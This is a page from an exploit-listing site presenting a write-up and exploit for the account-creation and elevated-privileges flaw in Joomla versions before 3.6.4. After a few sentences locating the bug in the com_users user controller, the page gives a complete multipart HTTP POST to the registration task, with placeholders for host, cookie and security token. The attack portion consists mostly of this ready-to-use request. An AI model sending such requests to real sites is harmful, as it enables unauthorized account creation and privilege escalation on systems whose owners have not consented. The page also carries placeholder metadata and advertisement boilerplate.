Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-XXXX-XXXX | CWE-XX | $200 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Author Name | High | Remote | 2016-10-27 |
Joomla (< 3.6.4) Account Creation/Elevated Privileges write-up and exploit Yesterday Joomla published version 3.6.4, an update to patch security issues: - High PriorityCoreAccount Creation (affecting Joomla! 3.4.4 through 3.6.3) More information - High PriorityCoreElevated Privileges (affecting Joomla! 3.4.4 through 3.6.3) More information Because I was curious to see how these vulnerabilies worked I decided to check out the patch and write an exploit. By looking at the changes, the issue had to be in the components/com_users/controllers/user.php file. EXPLOIT ========================================================= POST /index.php?option=com_users&task=user.register HTTP/1.1 Host: [INSERT_HOST] Referer: [INSERT_HOST]/index.php/component/users/?view=registration Cookie: [INSERT_COOKIE] Connection: close ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[name]" hackers ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[username]" hackers ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[password1]" password ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[password2]" password ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[email1]" [email protected] ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[email2]" [email protected] ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="option" com_users ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="task" user.register ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]" 1 ------WebKitFormBoundarydPTNyMPMzmAhBsf4-- =========================================================
Copyright ©2024 Exploitalert.